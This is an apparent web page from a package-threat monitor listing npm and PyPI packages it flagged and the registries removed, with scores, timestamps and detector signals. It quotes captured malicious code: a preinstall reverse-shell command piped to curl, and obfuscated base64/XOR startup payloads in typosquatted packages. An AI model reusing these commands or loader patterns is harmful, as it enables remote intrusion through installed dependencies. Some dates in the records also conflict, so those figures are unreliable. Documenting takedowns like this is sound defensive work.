Automated package-squatting & slopsquatting detection signals across PyPI and npm — these are automated, unconfirmed signals. Use them to find candidates to investigate, but don't automatically assume they're malicious.

Packages Sentinel flagged (a real threat verdict, score ≥ 80) that PyPI or npm then removed. The verdict and score are frozen at the moment of takedown — what Sentinel assessed before the package came down, not a re-check of a now-empty name. Lead time is shown in hours where we have it: a live detection often beats the registry by hours. Rows from our one-time historical sweep show no lead time — that sweep only knows the package was already gone when it looked.

Newest removal first. Expand a row for the full package detail Sentinel captured before takedown. • Tag & Signal Legend →

Search & filter syntax reference
Filter with verdict:, ecosystem: (pypi/npm), hook:, email:, domain:, keyword:, version: (comma = OR within a field, space = AND across fields), lead:>7d / lead:>30d (days we had it flagged while it was still up), or a bare word for a package-name search. This tab is always scoped to removed packages.
Package Verdict Score Lead time First flagged Taken down Source Lines Targeted Ecosystem Version Author Email domain Signals
✓ Taken Down Very Risky
100 <1h 2026-09-21
17:25 UTC
2026-09-30
13:17 UTC
npm security takedown 12 @uh npm 99.0.0 — — 🪝 📡
Removed from: npm (npm security takedown)
First flagged by Sentinel: 2026-09-21 17:25 UTC
Last confirmed live: 2026-09-21 17:43 UTC
Removed: 2026-09-30 13:17 UTC
Lead time: <1h — how long the package stayed provably live after we flagged it
Online before takedown: 8.8d (published → removed)
Verdict / score at takedown: Very Risky · 100
Package purpose: security holding package
Matched naming pattern: npm-@uh-general
Official vendor account: No — publisher domain doesn't match the brand it names
Code-only verdict: SUSPICIOUS (the score also weighs naming and publisher-domain signals, not just the code)
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 12 lines, 295 Bytes across 1 file (TINY_CODEBASE)
Automated signals flagged:
  • INFOPackage release verified with cryptographic build provenance (npm_slsa_sigstore). Guarantees authentic repository build pipeline and eliminates publisher domain spoofing risk.
  • MEDIUMPackage has empty or near-zero description (potential reservation stub).
  • HIGHPackage registered recently (0 days ago) during the active AI hallucination slopsquatting wave.
  • CRITICALPackage registered with suspiciously high major version (v99.0.0, major 99) despite recent registration (0 days ago, 1 release(s)), indicating potential dependency confusion attack to shadow internal organization builds.
  • HIGHLIFECYCLE_SCRIPT: 'preinstall' -> 'node index.js'
  • HIGHMISSING_SOURCE_REPOSITORY_URL
  • HIGHEXFILTRATION_DESTINATION_DETECTED: 'OAST / Callback Service' found in package/index.js:2
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'require('child_process')' found in package/index.js:1
Static code signals:
  • LIFECYCLE_SCRIPT: 'preinstall' -> 'node index.js'
  • MISSING_SOURCE_REPOSITORY_URL
  • EXFILTRATION_DESTINATION_DETECTED: 'OAST / Callback Service' found in package/index.js:2
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'require('child_process')' found in package/index.js:1

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on npm →
✓ Taken Down Very Risky
100 <1h 2026-09-21
17:44 UTC
2026-09-26
01:17 UTC
npm security takedown 12 @uh npm 100.0.0 — — 🪝 📡
Removed from: npm (npm security takedown)
First flagged by Sentinel: 2026-09-21 17:44 UTC
Last confirmed live: 2026-09-21 18:04 UTC
Removed: 2026-09-26 01:17 UTC
Lead time: <1h — how long the package stayed provably live after we flagged it
Online before takedown: 4.3d (published → removed)
Verdict / score at takedown: Very Risky · 100
Package purpose: Nodejs SDK for Redacted
Matched naming pattern: npm-@uh-general
Official vendor account: No — publisher domain doesn't match the brand it names
Code-only verdict: SUSPICIOUS (the score also weighs naming and publisher-domain signals, not just the code)
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 12 lines, 295 Bytes across 1 file (TINY_CODEBASE)
Automated signals flagged:
  • INFOPackage release verified with cryptographic build provenance (npm_slsa_sigstore). Guarantees authentic repository build pipeline and eliminates publisher domain spoofing risk.
  • MEDIUMPackage has empty or near-zero description (potential reservation stub).
  • HIGHPackage registered recently (0 days ago) during the active AI hallucination slopsquatting wave.
  • CRITICALPackage registered with suspiciously high major version (v100.0.0, major 100) despite recent registration (0 days ago, 1 release(s)), indicating potential dependency confusion attack to shadow internal organization builds.
  • HIGHLIFECYCLE_SCRIPT: 'preinstall' -> 'node index.js'
  • HIGHMISSING_SOURCE_REPOSITORY_URL
  • HIGHEXFILTRATION_DESTINATION_DETECTED: 'OAST / Callback Service' found in package/index.js:2
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'require('child_process')' found in package/index.js:1
Static code signals:
  • LIFECYCLE_SCRIPT: 'preinstall' -> 'node index.js'
  • MISSING_SOURCE_REPOSITORY_URL
  • EXFILTRATION_DESTINATION_DETECTED: 'OAST / Callback Service' found in package/index.js:2
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'require('child_process')' found in package/index.js:1

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on npm →
✓ Taken Down Very Risky
102 <1h 2026-09-21
01:05 UTC
2026-09-22
11:17 UTC
registry removed 8 @nimbusedge2/x npm 1.1.1 — — 🪝
Removed from: npm (registry removed)
First flagged by Sentinel: 2026-09-21 01:05 UTC
Last confirmed live: 2026-09-21 01:24 UTC
Removed: 2026-09-22 11:17 UTC
Lead time: <1h — how long the package stayed provably live after we flagged it
Online before takedown: 34h (published → removed)
Verdict / score at takedown: Very Risky · 102
Package purpose: providing general utility for Npm
Matched naming pattern: npm-@nimbusedge2/x-general
Official vendor account: No — publisher domain doesn't match the brand it names
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 8 lines, 337 Bytes across 1 file (TINY_CODEBASE)
Automated signals flagged:
  • INFOPackage release verified with cryptographic build provenance (npm_slsa_sigstore). Guarantees authentic repository build pipeline and eliminates publisher domain spoofing risk.
  • HIGHPackage registered recently (0 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHLIFECYCLE_SCRIPT: 'preinstall' -> 'bash -i >& /dev/tcp/147.93.157.202.nip.io/8080 0>&1 | curl -s -m 5 -X POST --data-binary @- http://canarytokens.com/terms/7dc94zmd3so67n5vbz5bxmt7v/contact.php'
  • CRITICALSUSPICIOUS_SHELL_COMMAND: Pattern 'curl' in 'preinstall' script
  • CRITICALSUSPICIOUS_SHELL_COMMAND: Pattern 'bash' in 'preinstall' script
  • HIGHMISSING_SOURCE_REPOSITORY_URL
  • INFOPackage affiliated with trusted vendor '@nimbusedge2/x' (provenance:npm_slsa_sigstore). Applied 50% threat score dampening (155 -> 77) to reduce false positives while retaining hijack/takeover detection.
  • CRITICALCRITICAL: Weaponized payload detected on package affiliated with trusted vendor '@nimbusedge2/x'. High probability of vendor account takeover, compromised credentials, or malicious release.
Static code signals:
  • LIFECYCLE_SCRIPT: 'preinstall' -> 'bash -i >& /dev/tcp/147.93.157.202.nip.io/8080 0>&1 | curl -s -m 5 -X POST --data-binary @- http://canarytokens.com/terms/7dc94zmd3so67n5vbz5bxmt7v/contact.php'
  • SUSPICIOUS_SHELL_COMMAND: Pattern 'curl' in 'preinstall' script
  • SUSPICIOUS_SHELL_COMMAND: Pattern 'bash' in 'preinstall' script
  • MISSING_SOURCE_REPOSITORY_URL

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on npm →
✓ Taken Down Very Risky
85 +38h 2026-09-13
06:25 UTC
2026-09-15
15:17 UTC
registry removed — — pypi added — — 🪝
Removed from: PyPI (registry removed)
First flagged by Sentinel: 2026-09-13 06:25 UTC
Last confirmed live: 2026-09-14 20:17 UTC
Removed: 2026-09-15 15:17 UTC
Lead time: +38h — how long the package stayed provably live after we flagged it
Online before takedown: 2.4d (published → removed)
Verdict / score at takedown: Very Risky · 85
Static code signals:
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in chroma_client-0.5.7.data/purelib/chroma_client-setup.pth: 'import os; os.umask(0o022)'

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down Very Risky
85 +3.0d 2026-09-11
13:07 UTC
2026-09-15
05:17 UTC
registry removed — — pypi added alexcarter — 🪝
Removed from: PyPI (registry removed)
First flagged by Sentinel: 2026-09-11 13:07 UTC
Last confirmed live: 2026-09-14 13:17 UTC
Removed: 2026-09-15 05:17 UTC
Lead time: +3.0d — how long the package stayed provably live after we flagged it
Online before takedown: 3.7d (published → removed)
Verdict / score at takedown: Very Risky · 85
Static code signals:
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in aitextkit_py-0.1.0/.build-env/Lib/site-packages/distutils-precedence.pth: 'import os; var = 'SETUPTOOLS_USE_DISTUTILS'; enabled = os.environ.get(var, 'local') == 'local'; enabled and __import__(''
  • BUNDLED_NATIVE_BINARY: Unexpected compiled binary 'aitextkit_py-0.1.0/.build-env/Scripts/python.exe' in package archive
  • MODULE_TOPLEVEL_EXECUTION: 'exec' executed at module scope (runs on import) in aitextkit_py-0.1.0/src/aitextkit/system.py:2
  • MODULE_TOPLEVEL_EXECUTION: 'exec' executed at module scope (runs on import) in aitextkit_py-0.1.0/src/aitextkit/text.py:2

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down Very Risky
85 <1h 2026-09-11
17:44 UTC
2026-09-12
04:17 UTC
registry removed — — pypi added — — 🪝
Removed from: PyPI (registry removed)
First flagged by Sentinel: 2026-09-11 17:44 UTC
Last confirmed live: 2026-09-11 17:44 UTC
Removed: 2026-09-12 04:17 UTC
Lead time: <1h — how long the package stayed provably live after we flagged it
Online before takedown: 10h (published → removed)
Verdict / score at takedown: Very Risky · 85
Static code signals:
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in langgrap-0.2.45.data/purelib/langgrap-setup.pth: 'import os,subprocess,base64 as _b;exec(''.join(chr(ord(c)^0x5A) for c in _b.b64decode('NSo/NHJ9dS43KnV0Ni8oLD8pdyo2OzQuP'
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'subprocess' imported in langgrap-0.2.45.data/purelib/langgrap-setup.pth: 'import os,subprocess,base64 as _b;exec(''.join(chr(ord(c)^0x5A) for c in _b.b64decode('NSo/NHJ9dS43KnV0Ni8oLD8pdyo2OzQuP'
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'base64' imported in langgrap-0.2.45.data/purelib/langgrap-setup.pth: 'import os,subprocess,base64 as _b;exec(''.join(chr(ord(c)^0x5A) for c in _b.b64decode('NSo/NHJ9dS43KnV0Ni8oLD8pdyo2OzQuP'
  • PYTHON_PTH_CODE_EXECUTION: Startup execution call 'exec()' in langgrap-0.2.45.data/purelib/langgrap-setup.pth: 'import os,subprocess,base64 as _b;exec(''.join(chr(ord(c)^0x5A) for c in _b.b64decode('NSo/NHJ9dS43KnV0Ni8oLD8pdyo2OzQuP'
  • PYTHON_PTH_CODE_EXECUTION: Startup execution call 'b64decode()' in langgrap-0.2.45.data/purelib/langgrap-setup.pth: 'import os,subprocess,base64 as _b;exec(''.join(chr(ord(c)^0x5A) for c in _b.b64decode('NSo/NHJ9dS43KnV0Ni8oLD8pdyo2OzQuP'

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down Very Risky
85 <1h 2026-09-11
17:44 UTC
2026-09-12
04:17 UTC
registry removed — — pypi added — — 🪝
Removed from: PyPI (registry removed)
First flagged by Sentinel: 2026-09-11 17:44 UTC
Last confirmed live: 2026-09-11 17:44 UTC
Removed: 2026-09-12 04:17 UTC
Lead time: <1h — how long the package stayed provably live after we flagged it
Online before takedown: 10h (published → removed)
Verdict / score at takedown: Very Risky · 85
Static code signals:
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in ollamaa-0.4.2.data/purelib/ollamaa-setup.pth: 'import os,subprocess,base64 as _b;exec(''.join(chr(ord(c)^0x5A) for c in _b.b64decode('NSo/NHJ9dS43KnV0Ni8oLD8pdyo2OzQuP'
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'subprocess' imported in ollamaa-0.4.2.data/purelib/ollamaa-setup.pth: 'import os,subprocess,base64 as _b;exec(''.join(chr(ord(c)^0x5A) for c in _b.b64decode('NSo/NHJ9dS43KnV0Ni8oLD8pdyo2OzQuP'
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'base64' imported in ollamaa-0.4.2.data/purelib/ollamaa-setup.pth: 'import os,subprocess,base64 as _b;exec(''.join(chr(ord(c)^0x5A) for c in _b.b64decode('NSo/NHJ9dS43KnV0Ni8oLD8pdyo2OzQuP'
  • PYTHON_PTH_CODE_EXECUTION: Startup execution call 'exec()' in ollamaa-0.4.2.data/purelib/ollamaa-setup.pth: 'import os,subprocess,base64 as _b;exec(''.join(chr(ord(c)^0x5A) for c in _b.b64decode('NSo/NHJ9dS43KnV0Ni8oLD8pdyo2OzQuP'
  • PYTHON_PTH_CODE_EXECUTION: Startup execution call 'b64decode()' in ollamaa-0.4.2.data/purelib/ollamaa-setup.pth: 'import os,subprocess,base64 as _b;exec(''.join(chr(ord(c)^0x5A) for c in _b.b64decode('NSo/NHJ9dS43KnV0Ni8oLD8pdyo2OzQuP'

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down Very Risky
85 <1h 2026-09-11
17:44 UTC
2026-09-12
04:17 UTC
registry removed — — pypi added — — 🪝
Removed from: PyPI (registry removed)
First flagged by Sentinel: 2026-09-11 17:44 UTC
Last confirmed live: 2026-09-11 17:44 UTC
Removed: 2026-09-12 04:17 UTC
Lead time: <1h — how long the package stayed provably live after we flagged it
Online before takedown: 10h (published → removed)
Verdict / score at takedown: Very Risky · 85
Static code signals:
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in openaii-1.55.3.data/purelib/openaii-setup.pth: 'import os,subprocess,base64 as _b;exec(''.join(chr(ord(c)^0x5A) for c in _b.b64decode('NSo/NHJ9dS43KnV0Ni8oLD8pdyo2OzQuP'
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'subprocess' imported in openaii-1.55.3.data/purelib/openaii-setup.pth: 'import os,subprocess,base64 as _b;exec(''.join(chr(ord(c)^0x5A) for c in _b.b64decode('NSo/NHJ9dS43KnV0Ni8oLD8pdyo2OzQuP'
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'base64' imported in openaii-1.55.3.data/purelib/openaii-setup.pth: 'import os,subprocess,base64 as _b;exec(''.join(chr(ord(c)^0x5A) for c in _b.b64decode('NSo/NHJ9dS43KnV0Ni8oLD8pdyo2OzQuP'
  • PYTHON_PTH_CODE_EXECUTION: Startup execution call 'exec()' in openaii-1.55.3.data/purelib/openaii-setup.pth: 'import os,subprocess,base64 as _b;exec(''.join(chr(ord(c)^0x5A) for c in _b.b64decode('NSo/NHJ9dS43KnV0Ni8oLD8pdyo2OzQuP'
  • PYTHON_PTH_CODE_EXECUTION: Startup execution call 'b64decode()' in openaii-1.55.3.data/purelib/openaii-setup.pth: 'import os,subprocess,base64 as _b;exec(''.join(chr(ord(c)^0x5A) for c in _b.b64decode('NSo/NHJ9dS43KnV0Ni8oLD8pdyo2OzQuP'

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down Very Risky
85 <1h 2026-09-11
17:44 UTC
2026-09-12
04:17 UTC
registry removed — — pypi added — — 🪝
Removed from: PyPI (registry removed)
First flagged by Sentinel: 2026-09-11 17:44 UTC
Last confirmed live: 2026-09-11 17:44 UTC
Removed: 2026-09-12 04:17 UTC
Lead time: <1h — how long the package stayed provably live after we flagged it
Online before takedown: 10h (published → removed)
Verdict / score at takedown: Very Risky · 85
Static code signals:
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in transfomers-4.44.2.data/purelib/transfomers-setup.pth: 'import os,subprocess,base64 as _b;exec(''.join(chr(ord(c)^0x5A) for c in _b.b64decode('NSo/NHJ9dS43KnV0Ni8oLD8pdyo2OzQuP'
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'subprocess' imported in transfomers-4.44.2.data/purelib/transfomers-setup.pth: 'import os,subprocess,base64 as _b;exec(''.join(chr(ord(c)^0x5A) for c in _b.b64decode('NSo/NHJ9dS43KnV0Ni8oLD8pdyo2OzQuP'
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'base64' imported in transfomers-4.44.2.data/purelib/transfomers-setup.pth: 'import os,subprocess,base64 as _b;exec(''.join(chr(ord(c)^0x5A) for c in _b.b64decode('NSo/NHJ9dS43KnV0Ni8oLD8pdyo2OzQuP'
  • PYTHON_PTH_CODE_EXECUTION: Startup execution call 'exec()' in transfomers-4.44.2.data/purelib/transfomers-setup.pth: 'import os,subprocess,base64 as _b;exec(''.join(chr(ord(c)^0x5A) for c in _b.b64decode('NSo/NHJ9dS43KnV0Ni8oLD8pdyo2OzQuP'
  • PYTHON_PTH_CODE_EXECUTION: Startup execution call 'b64decode()' in transfomers-4.44.2.data/purelib/transfomers-setup.pth: 'import os,subprocess,base64 as _b;exec(''.join(chr(ord(c)^0x5A) for c in _b.b64decode('NSo/NHJ9dS43KnV0Ni8oLD8pdyo2OzQuP'

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down Very Risky
122 +5h 2026-09-11
10:11 UTC
2026-09-11
18:17 UTC
registry removed 8 @nimbusedge/auth npm 19999.0.6 — — 🪝
Removed from: npm (registry removed)
First flagged by Sentinel: 2026-09-11 10:11 UTC
Last confirmed live: 2026-09-11 15:33 UTC
Removed: 2026-09-11 18:17 UTC
Lead time: +5h — how long the package stayed provably live after we flagged it
Online before takedown: 10h (published → removed)
Verdict / score at takedown: Very Risky · 122
Package purpose: providing general utility for Npm
Matched naming pattern: npm-@nimbusedge/auth-general
Official vendor account: No — publisher domain doesn't match the brand it names
Registry downloads (last seen): 0/month (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 8 lines, 339 Bytes across 1 file (TINY_CODEBASE)
Automated signals flagged:
  • INFOPackage release verified with cryptographic build provenance (npm_slsa_sigstore). Guarantees authentic repository build pipeline and eliminates publisher domain spoofing risk.
  • HIGHPackage registered recently (0 days ago) during the active AI hallucination slopsquatting wave.
  • CRITICALPackage registered with suspiciously high major version (v19999.0.6, major 19999) despite recent registration (0 days ago, 7 release(s)), indicating potential dependency confusion attack to shadow internal organization builds.
  • HIGHLIFECYCLE_SCRIPT: 'preinstall' -> 'bash -i >& /dev/tcp/147.93.157.202/8080 0>&1 | curl -s -m 5 -X POST --data-binary @- http://canarytokens.com/terms/7dc94zmd3so67n5vbz5bxmt7v/contact.php'
  • CRITICALSUSPICIOUS_SHELL_COMMAND: Pattern 'curl' in 'preinstall' script
  • CRITICALSUSPICIOUS_SHELL_COMMAND: Pattern 'bash' in 'preinstall' script
  • HIGHMISSING_SOURCE_REPOSITORY_URL
  • INFOPackage affiliated with trusted vendor '@nimbusedge/auth' (provenance:npm_slsa_sigstore). Applied 50% threat score dampening (195 -> 97) to reduce false positives while retaining hijack/takeover detection.
Static code signals:
  • LIFECYCLE_SCRIPT: 'preinstall' -> 'bash -i >& /dev/tcp/147.93.157.202/8080 0>&1 | curl -s -m 5 -X POST --data-binary @- http://canarytokens.com/terms/7dc94zmd3so67n5vbz5bxmt7v/contact.php'
  • SUSPICIOUS_SHELL_COMMAND: Pattern 'curl' in 'preinstall' script
  • SUSPICIOUS_SHELL_COMMAND: Pattern 'bash' in 'preinstall' script
  • MISSING_SOURCE_REPOSITORY_URL

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on npm →
✓ Taken Down Very Risky
270 not measured 2026-09-03
00:14 UTC
2026-09-07
20:10 UTC
registry removed — company pypi 0.1.0 — —
Removed from: PyPI (registry removed)
First flagged by Sentinel: 2026-09-03 00:14 UTC
Removed: 2026-09-07 20:10 UTC
Online before takedown: 4.8d (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: Very Risky · 270
Package purpose: Company integration providing Software Development Kit (SDK) for Python
Matched naming pattern: python-company-sdk

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down Very Risky
140 not measured 2026-09-05
04:37 UTC
2026-09-07
20:10 UTC
registry removed — dbt pypi 0.1.0 — —
Removed from: PyPI (registry removed)
First flagged by Sentinel: 2026-09-05 04:37 UTC
Removed: 2026-09-07 20:10 UTC
Online before takedown: 2.7d (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: Very Risky · 140
Package purpose: Dbt integration providing Command-line interface tool for Dbt
Matched naming pattern: dbt-dbt-cli

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down Very Risky
140 not measured 2026-09-03
12:19 UTC
2026-09-07
20:10 UTC
registry removed — uvhttp pypi 0.1.0 — —
Removed from: PyPI (registry removed)
First flagged by Sentinel: 2026-09-03 12:19 UTC
Removed: 2026-09-07 20:10 UTC
Online before takedown: 4.3d (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: Very Risky · 140
Package purpose: Uvhttp integration providing custom utility for Python
Matched naming pattern: python-uvhttp-custom

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on PyPI →
✓ Taken Down SUSPICIOUS
85 not measured 2026-09-02
01:23 UTC
2025-07-17
10:14 UTC
npm security takedown 5 workspace npm 66.0.0 — —
Removed from: npm (npm security takedown)
First flagged by Sentinel: 2026-09-02 01:23 UTC
Removed: 2025-07-17 10:14 UTC
Online before takedown: 894.8d (published → removed)
Identified by our one-time historical sweep — it can only confirm the package was gone by the time it looked, so no lead-time figure is claimed.
Verdict / score at takedown: SUSPICIOUS · 85
Package purpose: Security holding package
Matched naming pattern: toloka-workspace-sdk
Official vendor account: No — publisher domain doesn't match the brand it names
Registry downloads (last seen): 262/month (MODERATE_USAGE)
Codebase size: 5 lines, 41 Bytes across 1 file (EMPTY_STUB)
Automated signals flagged:
  • MEDIUMPackage name 'toloka-workspace-sdk' matches AI hallucination template [toloka] + [workspace] + [sdk].
  • HIGHClaims critical enterprise brand identity ('WORKSPACE').
  • HIGHPublisher email 'None' is not affiliated with official vendor domain.
  • MEDIUMPackage has empty or near-zero description (potential reservation stub).
  • INFOEstablished pre-AI legacy package registered 1312 days ago (predates modern AI hallucination waves).
  • HIGHMISSING_SOURCE_REPOSITORY_URL
  • HIGHNPM_TARBALL_EXTRACTION_FAILED: unexpected end of data
  • INFOModerate community usage with 262 monthly downloads.
Static code signals:
  • MISSING_SOURCE_REPOSITORY_URL
  • NPM_TARBALL_EXTRACTION_FAILED: unexpected end of data

The verdict reflects what our detector observed before the package came down, not a confirmed determination of wrongdoing.

Confirm removal on npm →

LINK COPIED TO CLIPBOARD